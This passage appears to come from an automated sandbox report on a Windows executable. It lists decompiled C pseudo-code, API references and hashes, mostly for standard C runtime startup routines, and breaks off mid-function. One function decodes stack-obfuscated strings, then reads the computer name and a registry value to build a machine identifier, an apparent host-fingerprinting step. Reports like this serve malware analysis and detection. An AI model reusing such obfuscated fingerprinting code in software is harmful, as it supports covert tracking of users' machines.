__chsize_nolock.LIBCMT ref: 00449B21
__lseeki64_nolock.LIBCMT ref: 00449B33
__lseeki64_nolock.LIBCMT ref: 00449C2B
__lseeki64_nolock.LIBCMT ref: 00449C40
__close_nolock.LIBCMT ref: 00449CA0

Part of subcall function 00439649: CloseHandle.KERNEL32(00000000), ref: 00439699
Part of subcall function 00439649: GetLastError.KERNEL32(?,00449AF6,00000000,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004396A3
Part of subcall function 00439649: __free_osfhnd.LIBCMT ref: 004396B0
Part of subcall function 00439649: __dosmaperr.LIBCMT ref: 004396D2

Part of subcall function 00437D6A: __getptd_noexit.LIBCMT ref: 00437D6A

__lseeki64_nolock.LIBCMT ref: 00449CC2
CloseHandle.KERNEL32(00000000), ref: 00449DF7
___createFile.LIBCMT ref: 00449E16
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00449E23
__dosmaperr.LIBCMT ref: 00449E2A
__free_osfhnd.LIBCMT ref: 00449E4A
__invoke_watson.LIBCMT ref: 00449E78

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd
String ID:
API String ID: 710831883-0
Opcode ID: 279562335b5ed0158b1a75f53d76dcc031bdec3191d149c9649d5dd0b9e29622
Instruction ID: d7ac6ac754d4cba7dd25c79f56dff2cc1c8603b8b7a86ada0e9ab3623829fdfb
Opcode Fuzzy Hash: 279562335b5ed0158b1a75f53d76dcc031bdec3191d149c9649d5dd0b9e29622
Instruction Fuzzy Hash: D22221B1D001469AFF299F68DC85BAF7B60EF05314F24422BE961A73D1C63D8D40E759

Uniqueness

Uniqueness Score: -1,00%

Function 0043A226, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043A226(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t80;
				signed int _t84;
				long _t88;
				signed int _t92;
				signed int _t96;
				signed int _t97;
				signed char _t101;
				signed int _t103;
				intOrPtr _t104;
				intOrPtr* _t107;
				signed char _t109;
				long _t117;
				signed int _t126;
				signed int _t130;
				signed int _t131;
				signed int _t134;
				void** _t136;
				signed int _t138;
				void* _t139;
				signed int _t140;
				void** _t144;
				signed int _t146;
				void* _t147;
				signed int _t151;
				void* _t152;

				_push(0x64);
				_push(0x4679e0);
				E004391D0(__ebx, __edi, __esi);
				L00435DD9(__edx, 0xb);
				_t126 = 0;
				 *(_t152 - 4) = 0;
				_push(0x40);
				_t138 = 0x20;
				_push(_t138); // executed
				_t80 = E004374B4(); // executed
				_t130 = _t80;
				 *(_t152 - 0x24) = _t130;
				if(_t130 != 0) {
					 *0x46c2a0 = _t80;
					 *0x46c954 = _t138;
					while(1) {
						__eflags = _t130 - _t80 + 0x800;
						if(_t130 >= _t80 + 0x800) {
							break;
						}
						 *((short*)(_t130 + 4)) = 0xa00;
						 *_t130 =  *_t130 | 0xffffffff;
						 *(_t130 + 8) = _t126;
						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x00000080;
						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x0000007f;
						 *((short*)(_t130 + 0x25)) = 0xa0a;
						 *(_t130 + 0x38) = _t126;
						 *(_t130 + 0x34) = _t126;
						_t130 = _t130 + 0x40;
						 *(_t152 - 0x24) = _t130;
						_t80 =  *0x46c2a0; // 0x325f90
					}
					GetStartupInfoW(_t152 - 0x74);
					__eflags =  *((short*)(_t152 - 0x42));
					if( *((short*)(_t152 - 0x42)) == 0) {
						while(1) {
							L27:
							 *(_t152 - 0x2c) = _t126;
							__eflags = _t126 - 3;
							if(_t126 >= 3) {
								break;
							}
							_t144 = (_t126 << 6) +  *0x46c2a0;
							 *(_t152 - 0x24) = _t144;
							__eflags =  *_t144 - 0xffffffff;
							if( *_t144 == 0xffffffff) {
								L31:
								_t144[1] = 0x81;
								__eflags = _t126;
								if(_t126 != 0) {
									_t65 = _t126 - 1; // -1
									asm("sbb eax, eax");
									_t88 =  ~_t65 + 0xfffffff5;
									__eflags = _t88;
								} else {
									_t88 = 0xfffffff6;
								}
								_t139 = GetStdHandle(_t88);
								__eflags = _t139 - 0xffffffff;
								if(_t139 == 0xffffffff) {
									L43:
									_t144[1] = _t144[1] | 0x00000040;
									 *_t144 = 0xfffffffe;
									_t92 =  *0x46c9ec; // 0x326958
									__eflags = _t92;
									if(_t92 != 0) {
										 *( *((intOrPtr*)(_t92 + _t126 * 4)) + 0x10) = 0xfffffffe;
									}
									goto L45;
								} else {
									__eflags = _t139;
									if(_t139 == 0) {
										goto L43;
									}
									_t96 = GetFileType(_t139);
									__eflags = _t96;
									if(_t96 == 0) {
										goto L43;
									}
									 *_t144 = _t139;
									_t97 = _t96 & 0x000000ff;
									__eflags = _t97 - 2;
									if(_t97 != 2) {
										__eflags = _t97 - 3;
										if(_t97 != 3) {
											L42:
											_t69 =  &(_t144[3]); // -4637332
											InitializeCriticalSectionAndSpinCount(_t69, 0xfa0);
											_t144[2] = _t144[2] + 1;
											L45:
											_t126 = _t126 + 1;
											continue;
										}
										_t101 = _t144[1] | 0x00000008;
										__eflags = _t101;
										L41:
										_t144[1] = _t101;
										goto L42;
									}
									_t101 = _t144[1] | 0x00000040;
									goto L41;
								}
							}
							__eflags =  *_t144 - 0xfffffffe;
							if( *_t144 == 0xfffffffe) {
								goto L31;
							}
							_t144[1] = _t144[1] | 0x00000080;
							goto L45;
						}
						 *(_t152 - 4) = 0xfffffffe;
						E0043A4CB();
						_t84 = 0;
						__eflags = 0;
						L47:
						return E00439215(_t84);
					}
					_t103 =  *(_t152 - 0x40);
					__eflags = _t103;
					if(_t103 == 0) {
						goto L27;
					}
					_t131 =  *_t103;
					 *(_t152 - 0x1c) = _t131;
					_t104 = _t103 + 4;
					 *((intOrPtr*)(_t152 - 0x28)) = _t104;
					 *(_t152 - 0x20) = _t104 + _t131;
					__eflags = _t131 - 0x800;
					if(_t131 >= 0x800) {
						_t131 = 0x800;
						 *(_t152 - 0x1c) = 0x800;
					}
					_t146 = 1;
					__eflags = 1;
					 *(_t152 - 0x30) = 1;
					while(1) {
						__eflags =  *0x46c954 - _t131; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t134 = E004374B4(_t138, 0x40);
						 *(_t152 - 0x24) = _t134;
						__eflags = _t134;
						if(_t134 != 0) {
							0x46c2a0[_t146] = _t134;
							 *0x46c954 =  *0x46c954 + _t138;
							__eflags =  *0x46c954;
							while(1) {
								__eflags = _t134 - 0x46c2a0[_t146] + 0x800;
								if(_t134 >= 0x46c2a0[_t146] + 0x800) {
									break;
								}
								 *((short*)(_t134 + 4)) = 0xa00;
								 *_t134 =  *_t134 | 0xffffffff;
								 *(_t134 + 8) = _t126;
								 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
								 *((short*)(_t134 + 0x25)) = 0xa0a;
								 *(_t134 + 0x38) = _t126;
								 *(_t134 + 0x34) = _t126;
								_t134 = _t134 + 0x40;
								 *(_t152 - 0x24) = _t134;
							}
							_t146 = _t146 + 1;
							 *(_t152 - 0x30) = _t146;
							_t131 =  *(_t152 - 0x1c);
							continue;
						}
						_t131 =  *0x46c954; // 0x20
						 *(_t152 - 0x1c) = _t131;
						break;
					}
					_t140 = _t126;
					 *(_t152 - 0x2c) = _t140;
					_t107 =  *((intOrPtr*)(_t152 - 0x28));
					_t136 =  *(_t152 - 0x20);
					while(1) {
						__eflags = _t140 - _t131;
						if(_t140 >= _t131) {
							goto L27;
						}
						_t147 =  *_t136;
						__eflags = _t147 - 0xffffffff;
						if(_t147 == 0xffffffff) {
							L22:
							_t140 = _t140 + 1;
							 *(_t152 - 0x2c) = _t140;
							_t107 =  *((intOrPtr*)(_t152 - 0x28)) + 1;
							 *((intOrPtr*)(_t152 - 0x28)) = _t107;
							_t136 =  &(_t136[1]);
							 *(_t152 - 0x20) = _t136;
							continue;
						}
						__eflags = _t147 - 0xfffffffe;
						if(_t147 == 0xfffffffe) {
							goto L22;
						}
						_t109 =  *_t107;
						__eflags = _t109 & 0x00000001;
						if((_t109 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t109 & 0x00000008;
						if((_t109 & 0x00000008) != 0) {
							L20:
							_t151 = ((_t140 & 0x0000001f) << 6) + 0x46c2a0[_t140 >> 5];
							 *(_t152 - 0x24) = _t151;
							 *_t151 =  *_t136;
							 *((char*)(_t151 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t152 - 0x28))));
							_t37 = _t151 + 0xc; // 0xd
							InitializeCriticalSectionAndSpinCount(_t37, 0xfa0);
							_t38 = _t151 + 8;
							 *_t38 =  *(_t151 + 8) + 1;
							__eflags =  *_t38;
							_t136 =  *(_t152 - 0x20);
							L21:
							_t131 =  *(_t152 - 0x1c);
							goto L22;
						}
						_t117 = GetFileType(_t147);
						_t136 =  *(_t152 - 0x20);
						__eflags = _t117;
						if(_t117 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L27;
				}
				_t84 = E0043E580(_t152, 0x469acc, _t152 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L47;
			}

0x0043a226
0x0043a228
0x0043a22d
0x0043a234
0x0043a23a
0x0043a23c
0x0043a23f
0x0043a243
0x0043a244
0x0043a245
0x0043a24c
0x0043a24e
0x0043a253
0x0043a270
0x0043a275
0x0043a27b
0x0043a280
0x0043a282
0x00000000
0x00000000
0x0043a284
0x0043a28a
0x0043a28d
0x0043a290
0x0043a299
0x0043a29c
0x0043a2a2
0x0043a2a5
0x0043a2a8
0x0043a2ab
0x0043a2ae
0x0043a2ae
0x0043a2b9
0x0043a2bf
0x0043a2c4
0x0043a3f3
0x0043a3f3
0x0043a3f3
0x0043a3f6
0x0043a3f9
0x00000000
0x00000000
0x0043a404
0x0043a40a
0x0043a40d
0x0043a410
0x0043a425
0x0043a425
0x0043a429
0x0043a42b
0x0043a432
0x0043a437
0x0043a439
0x0043a439
0x0043a42d
0x0043a42f
0x0043a42f
0x0043a443
0x0043a445
0x0043a448
0x0043a48f
0x0043a495
0x0043a498
0x0043a49e
0x0043a4a3
0x0043a4a5
0x0043a4aa
0x0043a4aa
0x00000000
0x0043a44a
0x0043a44a
0x0043a44c
0x00000000
0x00000000
0x0043a44f
0x0043a455
0x0043a457
0x00000000
0x00000000
0x0043a459
0x0043a45b
0x0043a460
0x0043a463
0x0043a46d
0x0043a470
0x0043a47b
0x0043a480
0x0043a484
0x0043a48a
0x0043a4b1
0x0043a4b1
0x00000000
0x0043a4b1
0x0043a476
0x0043a476
0x0043a478
0x0043a478
0x00000000
0x0043a478
0x0043a469
0x00000000
0x0043a469
0x0043a448
0x0043a412
0x0043a415
0x00000000
0x00000000
0x0043a41d
0x00000000
0x0043a41d
0x0043a4b7
0x0043a4be
0x0043a4c3
0x0043a4c3
0x0043a4c5
0x0043a4ca
0x0043a4ca
0x0043a2ca
0x0043a2cd
0x0043a2cf
0x00000000
0x00000000
0x0043a2d5
0x0043a2d7
0x0043a2da
0x0043a2dd
0x0043a2e2
0x0043a2ea
0x0043a2ec
0x0043a2ee
0x0043a2f0
0x0043a2f0
0x0043a2f5
0x0043a2f5
0x0043a2f6
0x0043a2f9
0x0043a2f9
0x0043a2ff
0x00000000
0x00000000
0x0043a30b
0x0043a30d
0x0043a310
0x0043a312
0x0043a3a6
0x0043a3ad
0x0043a3ad
0x0043a3b3
0x0043a3bf
0x0043a3c1
0x00000000
0x00000000
0x0043a3c3
0x0043a3c9
0x0043a3cc
0x0043a3cf
0x0043a3d3
0x0043a3d9
0x0043a3dc
0x0043a3df
0x0043a3e2
0x0043a3e2
0x0043a3e7
0x0043a3e8
0x0043a3eb
0x00000000
0x0043a3eb
0x0043a318
0x0043a31e
0x00000000
0x0043a31e
0x0043a321
0x0043a323
0x0043a326
0x0043a329
0x0043a32c
0x0043a32c
0x0043a32e
0x00000000
0x00000000
0x0043a334
0x0043a336
0x0043a339
0x0043a393
0x0043a393
0x0043a394
0x0043a39a
0x0043a39b
0x0043a39e
0x0043a3a1
0x00000000
0x0043a3a1
0x0043a33b
0x0043a33e
0x00000000
0x00000000
0x0043a340
0x0043a342
0x0043a344
0x00000000
0x00000000
0x0043a346
0x0043a348
0x0043a358
0x0043a365
0x0043a36c
0x0043a371
0x0043a378
0x0043a380
0x0043a384
0x0043a38a
0x0043a38a
0x0043a38a
0x0043a38d
0x0043a390
0x0043a390
0x00000000
0x0043a390
0x0043a34b
0x0043a351
0x0043a354
0x0043a356
0x00000000
0x00000000
0x00000000
0x0043a356
0x00000000
0x0043a32c
0x0043a268
0x00000000

APIs

__lock.LIBCMT ref: 0043A234

Part of subcall function 00435DD9: __mtinitlocknum.LIBCMT ref: 00435DEB
Part of subcall function 00435DD9: EnterCriticalSection.KERNEL32(?,?,0043CCDF,0000000D), ref: 00435E04

__calloc_crt.LIBCMT ref: 0043A245

Part of subcall function 004374B4: __calloc_impl.LIBCMT ref: 004374C3
Part of subcall function 004374B4: Sleep.KERNEL32(00000000), ref: 004374DA

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043A260
GetStartupInfoW.KERNEL32(?,004679E0,00000064,00435CF6,004677A0,00000014), ref: 0043A2B9
__calloc_crt.LIBCMT ref: 0043A304
GetFileType.KERNEL32(00000001), ref: 0043A34B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0043A384

Strings

Xi2, xrefs: 0043A49E

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID: Xi2
API String ID: 1426640281-3775276916
Opcode ID: 2c7308b77851d379bcf0545528c4e779075f166b0e29f0427b787117bdf3f6b1
Instruction ID: e69c82956ab8bbd2fbf1053abc118ab26bd7c1b8d2a03b13b69b5ea5ac0969da
Opcode Fuzzy Hash: 2c7308b77851d379bcf0545528c4e779075f166b0e29f0427b787117bdf3f6b1
Instruction Fuzzy Hash: 7C81F5709442418FCB10CFA8C8845AEBBF0AF1A324F24526ED4E6A73D1D7799853CB5A

Uniqueness

Uniqueness Score: -1,00%

Function 00435C58, Relevance: 16.6, APIs: 11, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 94%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				signed int _t39;
				void* _t49;
				signed int _t52;
				void* _t54;
				void* _t56;

				_t50 = __edi;
				_t49 = __edx;
				L0043FE59();
				_push(0x14);
				_push(0x4677a0);
				E004391D0(__ebx, __edi, __esi);
				_t52 = E004378F7() & 0x0000ffff;
				L0043FE0C(2);
				_t56 =  *0x400000 - 0x5a4d; // 0x5a4d
				if(_t56 == 0) {
					_t17 =  *0x40003c; // 0xf8
					__eflags =  *((intOrPtr*)(_t17 + 0x400000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x400000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x400018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x400018)) != 0x10b) {
							goto L2;
						} else {
							_t39 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x400074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x400074)) > 0xe) {
								__eflags =  *(_t17 + 0x4000e8);
								_t6 =  *(_t17 + 0x4000e8) != 0;
								__eflags = _t6;
								_t39 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t39 = 0;
				}
				 *(_t54 - 0x1c) = _t39;
				_t18 = E0043C53A();
				_t57 = _t18;
				if(_t18 == 0) {
					L00435DB2(0x1c);
				}
				_t19 = L0043CD49(_t39, _t49, _t50, _t57);
				_t58 = _t19;
				if(_t19 == 0) {
					_t19 = L00435DB2(0x10);
				}
				E0043B9D9(_t19);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				_t21 = E0043A226(_t39, _t49, _t50, _t52, _t58); // executed
				if(_t21 < 0) {
					L00435DB2(0x1b);
				}
				 *0x46c9d4 = GetCommandLineA(); // executed
				_t23 = L0043FEF3(); // executed
				 *0x46baf8 = _t23;
				_t24 = L0043FAFE();
				_t60 = _t24;
				if(_t24 < 0) {
					E004314EA(_t39, _t49, _t50, _t52, _t60, 8);
				}
				_t25 = L0043FD2B(_t39, _t49, _t50, _t52);
				_t61 = _t25;
				if(_t25 < 0) {
					E004314EA(_t39, _t49, _t50, _t52, _t61, 9);
				}
				_t26 = E00431524(_t50, _t52, 1); // executed
				_t62 = _t26;
				if(_t26 != 0) {
					E004314EA(_t39, _t49, _t50, _t52, _t62, _t26);
				}
				_t27 = L0043FF7E();
				_push(_t52);
				_t53 = E004050B0(_t50, _t52, 0x400000, 0, _t27);
				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
				if(_t39 == 0) {
					E00431780(_t53);
				}
				E00431515();
				 *(_t54 - 4) = 0xfffffffe;
				return E00439215(_t53);
			}

0x00435c58
0x00435c58
0x00435c58
0x00435c62
0x00435c64
0x00435c69
0x00435c73
0x00435c78
0x00435c83
0x00435c8a
0x00435c90
0x00435c95
0x00435c9f
0x00000000
0x00435ca1
0x00435ca6
0x00435cad
0x00000000
0x00435caf
0x00435caf
0x00435cb1
0x00435cb8
0x00435cba
0x00435cc0
0x00435cc0
0x00435cc0
0x00435cc0
0x00435cb8
0x00435cad
0x00435c8c
0x00435c8c
0x00435c8c
0x00435c8c
0x00435cc3
0x00435cc6
0x00435ccb
0x00435ccd
0x00435cd1
0x00435cd6
0x00435cd7
0x00435cdc
0x00435cde
0x00435ce2
0x00435ce7
0x00435ce8
0x00435ced
0x00435cf1
0x00435cf8
0x00435cfc
0x00435d01
0x00435d08
0x00435d0d
0x00435d12
0x00435d17
0x00435d1c
0x00435d1e
0x00435d22
0x00435d27
0x00435d28
0x00435d2d
0x00435d2f
0x00435d33
0x00435d38
0x00435d3b
0x00435d41
0x00435d43
0x00435d46
0x00435d4b
0x00435d4c
0x00435d51
0x00435d5f
0x00435d61
0x00435d66
0x00435d69
0x00435d69
0x00435d6e
0x00435da3
0x00435db1

APIs

___security_init_cookie.LIBCMT ref: 00435C58

Part of subcall function 004378F7: GetStartupInfoW.KERNEL32(?), ref: 00437901

_fast_error_exit.LIBCMT ref: 00435CD1
_fast_error_exit.LIBCMT ref: 00435CE2
__RTC_Initialize.LIBCMT ref: 00435CE8
_fast_error_exit.LIBCMT ref: 00435CFC
GetCommandLineA.KERNEL32(004677A0,00000014), ref: 00435D02
___crtGetEnvironmentStringsA.LIBCMT ref: 00435D0D
__setargv.LIBCMT ref: 00435D17
__setenvp.LIBCMT ref: 00435D28
__cinit.LIBCMT ref: 00435D3B
__wincmdln.LIBCMT ref: 00435D4C

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__setargv__setenvp__wincmdln
String ID:
API String ID: 2757020214-0
Opcode ID: 841de6424ac41f5fbb6c62780dffe559637fe3209fb6737a2a0b435d976836df
Instruction ID: 32d02dead1b58a5aa9d4942bae7b75ec2c144327f2a04481a1d4b0d56fb39f02
Opcode Fuzzy Hash: 841de6424ac41f5fbb6c62780dffe559637fe3209fb6737a2a0b435d976836df
Instruction Fuzzy Hash: 8C21C960A40B0199F7207BB6698BB6E21545F1C71CF20B47FF504AA2D3DEBC8844869E

Uniqueness

Uniqueness Score: -1,00%

Function 00401000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 137
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00401000() {
				char* _t115;
				char* _t118;
				void* _t120;
				void* _t122;

				_t120 = _t122 - 0x74;
				 *(_t120 - 0x5c) = 0;
				memset(_t120 - 0x5b, 0, 0x7f);
				 *(_t120 + 0x30) = 0x80;
				 *(_t120 + 0x2c) = 0;
				 *(_t120 + 0x24) = 0;
				 *((char*)(_t120 + 0x64)) = 0x32;
				 *((char*)(_t120 + 0x65)) = 0x91;
				 *((char*)(_t120 + 0x66)) = 0x39;
				 *((char*)(_t120 + 0x67)) = 0x91;
				 *((char*)(_t120 + 0x68)) = 0x81;
				 *((char*)(_t120 + 0x69)) = 0x35;
				 *((char*)(_t120 + 0x6a)) = 0xb5;
				 *((char*)(_t120 + 0x6b)) = 0x70;
				 *((char*)(_t120 + 0x6c)) = 0x83;
				 *((char*)(_t120 + 0x6d)) = 0xaa;
				 *((char*)(_t120 + 0x6e)) = 0xbe;
				 *((char*)(_t120 + 0x6f)) = 0xdb;
				 *((char*)(_t120 + 0x70)) = 0x53;
				 *((char*)(_t120 + 0x71)) = 0x92;
				 *((char*)(_t120 + 0x72)) = 0x57;
				 *((char*)(_t120 + 0x34)) = 0x85;
				 *((char*)(_t120 + 0x35)) = 0x74;
				 *((char*)(_t120 + 0x36)) = 0xa9;
				 *((char*)(_t120 + 0x37)) = 0x74;
				 *((char*)(_t120 + 0x38)) = 0x2c;
				 *((char*)(_t120 + 0x39)) = 0xf1;
				 *((char*)(_t120 + 0x3a)) = 0x37;
				 *((char*)(_t120 + 0x3b)) = 0xb5;
				 *((char*)(_t120 + 0x3c)) = 2;
				 *((char*)(_t120 + 0x3d)) = 0x62;
				 *((char*)(_t120 + 0x3e)) = 0x37;
				 *((char*)(_t120 + 0x3f)) = 0x3f;
				 *((char*)(_t120 + 0x40)) = 0xd9;
				 *((char*)(_t120 + 0x41)) = 0x4e;
				 *((char*)(_t120 + 0x42)) = 0xec;
				 *((char*)(_t120 + 0x43)) = 0xb1;
				 *((char*)(_t120 + 0x44)) = 0xf7;
				 *((char*)(_t120 + 0x45)) = 0xd3;
				 *((char*)(_t120 + 0x46)) = 0xf6;
				 *((char*)(_t120 + 0x47)) = 0xeb;
				 *((char*)(_t120 + 0x48)) = 0xe3;
				 *((char*)(_t120 + 0x49)) = 0;
				 *((char*)(_t120 + 0x4a)) = 0xd9;
				 *((char*)(_t120 + 0x4b)) = 0x23;
				 *((char*)(_t120 + 0x4c)) = 0xec;
				 *((char*)(_t120 + 0x4d)) = 0x1a;
				 *((char*)(_t120 + 0x4e)) = 0xe1;
				 *((char*)(_t120 + 0x4f)) = 0x1b;
				 *((char*)(_t120 + 0x50)) = 0xf2;
				 *((char*)(_t120 + 0x51)) = 7;
				 *((char*)(_t120 + 0x52)) = 0xa5;
				 *((char*)(_t120 + 0x53)) = 0x3a;
				 *((char*)(_t120 + 0x54)) = 0xd1;
				 *((char*)(_t120 + 0x55)) = 0x28;
				 *((char*)(_t120 + 0x56)) = 0xc6;
				 *((char*)(_t120 + 0x57)) = 1;
				 *((char*)(_t120 + 0x58)) = 0xf7;
				 *((char*)(_t120 + 0x59)) = 6;
				 *((char*)(_t120 + 0x5a)) = 0xe0;
				 *((char*)(_t120 + 0x5b)) = 0x1a;
				 *((char*)(_t120 + 0x5c)) = 0xf1;
				 *((char*)(_t120 + 0x5d)) = 0x22;
				 *((char*)(_t120 + 0x5e)) = 0xe0;
				 *((char*)(_t120 + 0x5f)) = 6;
				 *((char*)(_t120 + 0x60)) = 0xf6;
				 *((char*)(_t120 + 0x61)) = 0x1d;
				 *((char*)(_t120 + 0x62)) = 0xea;
				 *((char*)(_t120 + 0x63)) = 0x1a;
				_t118 = E00402F3D(_t120 + 0x64);
				_t115 = E00402F3D(_t120 + 0x34);
				if(GetComputerNameA(_t120 - 0x5c, _t120 + 0x30) != 0) {
					 *(_t120 + 0x2c) = E00402FA9(_t120 - 0x5c, lstrlenA(_t120 - 0x5c));
				}
				RegOpenKeyExA(0x80000002, _t115, 0, 0x20119, _t120 + 0x28); // executed
				 *(_t120 + 0x30) = 4;
				RegQueryValueExA( *(_t120 + 0x28), _t118, 0, 0, _t120 + 0x24, _t120 + 0x30); // executed
				RegCloseKey( *(_t120 + 0x28)); // executed
				_push( *(_t120 + 0x24) ^  *(_t120 + 0x2c) ^ 0xac67baee);
				wsprintfA( *(_t120 + 0x7c), "%8X");
				E00401686(_t118);
				return E00401686(_t115);
			}

0x00401001
0x00401017
0x0040101a
0x00401025
0x0040102c
0x0040102f
0x00401032
0x00401036
0x0040103a
0x0040103e
0x00401042
0x00401046
0x0040104a
0x0040104e
0x00401052
0x00401056
0x0040105a
0x0040105e
0x00401062
0x00401066
0x0040106a
0x0040106e
0x00401072
0x00401076
0x0040107a
0x0040107e
0x00401082
0x00401086
0x0040108a
0x0040108e
0x00401092
0x00401096
0x0040109a
0x0040109e
0x004010a2
0x004010a6
0x004010aa
0x004010ae
0x004010b2
0x004010b6
0x004010ba
0x004010be
0x004010c2
0x004010c5
0x004010c9
0x004010cd
0x004010d1
0x004010d5
0x004010d9
0x004010dd
0x004010e1
0x004010e5
0x004010e9
0x004010ed
0x004010f1
0x004010f5
0x004010f9
0x004010fd
0x00401101
0x00401105
0x00401109
0x0040110d
0x00401111
0x00401115
0x00401119
0x0040111d
0x00401121
0x00401125
0x00401129
0x00401132
0x0040113c
0x0040114e
0x00401163
0x00401163
0x00401176
0x0040118a
0x00401191
0x0040119a
0x004011ab
0x004011b4
0x004011be
0x004011d0

APIs

memset.NTDLL ref: 0040101A
GetComputerNameA.KERNEL32(?,?), ref: 00401146
lstrlenA.KERNEL32(?), ref: 00401154
RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00401176
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00401191
RegCloseKey.KERNEL32(?), ref: 0040119A
wsprintfA.USER32 ref: 004011B4

Strings

%8X, xrefs: 004011AC
CH[w[H[wE[w, xrefs: 00401191

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CloseComputerNameOpenQueryValuelstrlenmemsetwsprintf
String ID: %8X$CH[w[H[wE[w
API String ID: 2837000840-191760
Opcode ID: ac10664937e6a6ed647cbee3735b69924c4295e9fb714bec2ecc55bdb2fb2ce2
Instruction ID: b1847963b4b8e50b272fc41cc52375f0b1f950c94693955188b6e59f2c16eb7e
Opcode Fuzzy Hash: ac10664937e6a6ed647cbee3735b69924c4295e9fb714bec2ecc55bdb2fb2ce2
Instruction Fuzzy Hash: 7A61DA604087CDD9DB22CF7C8948ACE3F945F27368F480399FDE45A2E2D369854AC766

Uniqueness

Uniqueness Score: -1,00%

Function 00401810, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401810(void* __eflags) {
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t45;

				E00432414(0x44ca34, _t45);
				_t1 = _t45 - 0x14; // -19, executed
				L00408C9D(_t1, 0); // executed
				_t40 =  *0x46ab48;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				 *((intOrPtr*)(_t45 - 0x10)) = _t40;
				_t43 = E00402709( *((intOrPtr*)(_t45 + 8)), L00401FE7(0x46ab3c));
				if(_t43 == 0) {
					if(_t40 == 0) {
						_push( *((intOrPtr*)(_t45 + 8)));
						_t7 = _t45 - 0x10; // -15
						if(E00402616() == 0xffffffff) {
							_t8 = _t45 - 0x20; // -31
							L00431FEF(_t8, "bad cast");
							_t9 = _t45 - 0x20; // -31
							E004323B9(_t9, 0x467220);
						}
						_t43 =  *((intOrPtr*)(_t45 - 0x10));
						 *0x46ab48 = _t43;
						 *((intOrPtr*)( *_t43 + 4))();
						E004091E4(_t43);
					} else {
						_t43 = _t40;
					}
				}
				_t12 = _t45 - 0x14; // -19
				L00408CF9(_t12);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t43;
